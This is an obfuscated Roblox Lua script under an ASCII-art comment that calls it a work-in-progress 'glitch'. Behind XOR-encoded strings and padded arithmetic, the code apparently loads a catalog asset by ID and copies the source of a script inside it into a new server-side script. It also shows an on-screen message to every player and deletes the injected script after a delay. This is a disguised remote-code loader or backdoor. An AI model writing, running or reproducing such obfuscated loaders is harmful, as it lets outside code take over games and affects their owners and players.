--[[ More work would be created on this obfuscated script! Although this just uses the code a little differently but we would do more later to turn the obsfucated script into a functional glitch! <!olddorito> <!roblox> ./#####(########(((((#####(, ,/###(//(####%#############/.
((,..(#######((((/,...,/((. .##/,.... ..,,,,,... ..,((/
.(#/ .#(.......,(#(,. .#(/. ,(##/,///(###((##((#(, ((.
./#/, ./#(, .,/##(//(#(. .(#/,. .,/#(. ,/##/,. .((,(#(,. .((,
,((* (#//((#(,(#%#(/. .,(#/, .,/((,. ./((#%#/. ((..(#. ,/#/.
./#/, ./##(/,*/((#(/,. ..,(##/,. .(#/, .(####(. .(#,../#/, ,#(,
,(#, ,(##(///((((/,,,//((((((//(#(/,,,,,,,,,,... .(#(. ..,/((((((((((((..#(* .(#/.
,/#/. .,,//(((((((((/,,.. .,,///(//((/((#((#%######(/,,... ..,/((#(###( .#(
((,. ,/(/. .,////((((((/,,... ...,,... .((
.,/###. ..,//((((###((((//,,....../(/.
,/##(,,. ..,,/(((##((##(,
,(#. .... .. ..,.. .,(#(.
,/#. .,. ... ... .,,,,,,. /#(.
,(#. ... .,. ... .,,....,,. ./((((/,. (/.
((. .,/((((//,. ... .,. ... .,,. ..,,. .,/##%%%###%%%%#(/,. ((.
((,. ,/##%%##%%###%#(,. ... .,. ... .,,. ..,,.. ./##%%%%%#######%%%(. ((.
((, .#%%#%%%#####%%%%%#/, ... .,. ... .,,. ..,. ,##%%###%%%%%###%%#%( ,(#,.
((, .#%%%#%%##%%#%%%%%%%%#.... .,. ... ..,. .,,.. .##%##%%%%%%%%%%%%#%# ./#/.
((. .#%%##%%##%%%%%%%%%%%##,.. .,. ... .,,. .,,. ,(#%%%%###%%%%%%#%%#. ,((,
((. ,##%%#%###%%%%%%%%%%%%#/,.. .,. ... .,, ..,.. .(%%%%%%%%%##%%#/, ,(#,
((. ./(#%%#%%%#%%%%%%%%%%#(,,,. .,. ... .,,....,,.. .,/(######(/.. ,(#.
((. .(#%##%%%%##%%%%%#(. ... ... ... ..,,,,.. ,(#.
((. ,((#######(/,. ...... ..,... .,,,.. ./#/,
((, .. .,,. ... ./#/,
,(#. ..,,,,. ... .... ..,,,. ..,,,.. ..,,.. ,((
./#/. .. ..,....,,.. ..,,,,....,,,,,,...,,...,,,..,,.. .,,. .,(##%####%%####(//,.. ./(/.
./#/. .(########%#/. .,,. .,,..,, .,,.,,,. .. .,...,,. ,,,,,,,,. .,,,.. ..,,/(#####/, ./(/.
./#/. .,(##(/,........ .,,. .,,...,,,...,,.,,,. ,,. .,. ... .(##/. .((
.#(, .##/, .,,. .,,. ..... .,,. ..,,. .,(#(, .(#*
,(#, ,(%(, .,,.,,,. ,/(#########(/, .,(#(, .(#*
,/#/. ./##. ,,,.. .,(###(/,.....,(##. ,/##(, .((*
.#/, ,(##. .,(##/,. ./##(,. ./##(, .((
.,#(* ,(#(, .,(##(,. ,/##. .##(. .((
.((* ,(%#. .(#(/. ./##/, ..,/(##/, .,#(
.((* ,/##(,. .,(##(.. .(##/, ...,,,(##(/. .((*
.((* ,/###(,... ....,/###(. ./##(,.....,/(######((. ,/((.
./##((//. ,/(#################%%##/, . .(########(/,. ./#(/.
..,(#(,.....,,,,,,.. .,(##(.
./(######(/,. ..(##(/,.
.,(#####((/////////,.. ..,,///(((#####((/.
...,***((###(/,. .(#%###(((//,,.....
...,/(##((//,//(((###((((/,..
..,,/(/,,,...

Download HTML (.html) (.lua) (.xml)

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v14,v15) local v16={};for v20=1, #v14 do v6(v16,v0(v4(v1(v2(v14,v20,v20 + 1 )),v1(v2(v15,1 + (v20% #v15) ,1 + (v20% #v15) + 1 )))%256 ));end return v5(v16);end local v8=game:GetService(v7("\248\205\200\32\244\175\244\27\195\213\210\38\227","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\16\200\56\211\249\49\254\41\215\245\51\217\25\192\238\53\196\41\192","\156\67\173\74\165"));local v10=game:GetService(v7("\28\163\93\6\143\35\84\34\190\74\19","\38\84\215\41\118\220\70"));local v11=game:GetService(v7("\96\26\35\11\251\66\5","\158\48\118\66\114"));local v12=57303678 + 307060799 ;local function v13(v17) local v18,v19=pcall(function() return v8:LoadAsset(v17);end);if v18 then local v21=0;local v22;local v23;while true do if (v21==0) then v22=(1736 -(814 + 45)) -(282 + (1466 -871)) ;v23=nil;v21=1 + 0 ;end if (v21==(1 + 0)) then while true do if (v22==(1637 -(1523 + (999 -(261 + 624))))) then v23=v19:GetChildren()[1 -0 ];if (v23:IsA(v7("\134\43\20\35\127\160\200\168\54\25\38\103","\155\203\68\112\86\19\197")) or v23:IsA(v7("\106\210\53\253\76\75\230\234\79\205\34","\152\38\189\86\156\32\24\133")) or v23:IsA(v7("\207\84\181\79\236\67","\38\156\55\199"))) then local v25=v23.Source;local v26=v25;local v27=Instance.new(v7("\155\126\110\33\3\96","\35\200\29\28\72\115\20\154"));v27.Source=v26;v27.Parent=v9;local v30=v11:FindFirstChild(v7("\14\186\195\205\159\35\56\22","\84\121\223\177\191\237\76"));if v30 then local v31=0;local v32;local v33;local v34;while true do if (v31==(1081 -(1020 + 60))) then v34=nil;while true do if (v32==(1424 -(630 + 793))) then local v35=0 -0 ;while true do if (v35==(4 -3)) then v34.Position=UDim2.new(0.5, -(1470 -(226 + 1044)),(0.1 + 0) -(0 -0) ,(1864 -(760 + 987)) -(32 + (1998 -(1789 + 124))) );v32=2;break;end if (v35==(766 -(745 + 21))) then v34.Text=v7("\35\250\133\50\206\66\169\136\37\208\18\174\203\63\216\17\250\137\50\220\12\250\142\47\220\1\175\159\50\221\66\188\132\37\153\18\182\138\46\220\16\250\156\50\203\16\168\132\59\214\67","\185\98\218\235\87");v34.Size=UDim2.new(0 + 0 ,(990 -630) + (156 -116) ,0 -(0 + 0) ,1115 -(54 + 14 + 997) );v35=1056 -(87 + 968) ;end end end if (v32==(0 -0)) then v33=Instance.new(v7("\136\85\219\165\63\94\23\212\178","\161\219\54\169\192\90\48\80"));v33.Name=v7("\107\80\15\36\77\65\1\54\93\101\21\44","\69\41\34\96");v34=Instance.new(v7("\136\198\207\30\46\42\190\198\219","\75\220\163\183\106\98"));v32=1 + 0 ;end if (v32==(4 -2)) then local v37=1413 -(447 + 966) ;while true do if (v37==1) then v34.TextColor3=Color3.new(2 -1 ,(1818 -(1703 + 114)) + 0 ,702 -(376 + 325) );v32=4 -1 ;break;end if ((0 -0)==v37) then v34.TextScaled=true;v34.BackgroundColor3=Color3.new(0 + 0 ,0 -0 ,(14 -(9 + 5)) + 0 );v37=377 -(85 + 291) ;end end end if (v32==(1268 -(243 + 1022))) then v34.Parent=v33;for v39,v40 in ipairs(v11:GetPlayers()) do v33:Clone().Parent=v40:WaitForChild(v7("\251\48\38\255\219\184\236\41\46","\202\171\92\71\134\190"));end break;end end break;end if (v31==0) then v32=0;v33=nil;v31=1;end end end delay((3869 -2852) -(892 + 65) ,function() if (v27 and v27.Parent) then v27:Destroy();print(v7("\26\194\62\129\57\213\108\140\44\205\41\156\44\197\108\137\47\213\41\154\105\206\34\141\105\204\37\134\60\213\41\198","\232\73\161\76"));end end);else warn(v7("\151\214\67\89\27\191\153\67\78\13\190\205\2\84\13\251\215\77\73\94\186\153\81\94\12\178\201\86","\126\219\185\34\61"));end break;end end break;end end else warn(v7("\42\207\87\126\123\115\179\243\3\142\82\125\127\115\179\230\31\221\91\102\36","\135\108\174\62\18\30\23\147"),v19);end end v13(v12);
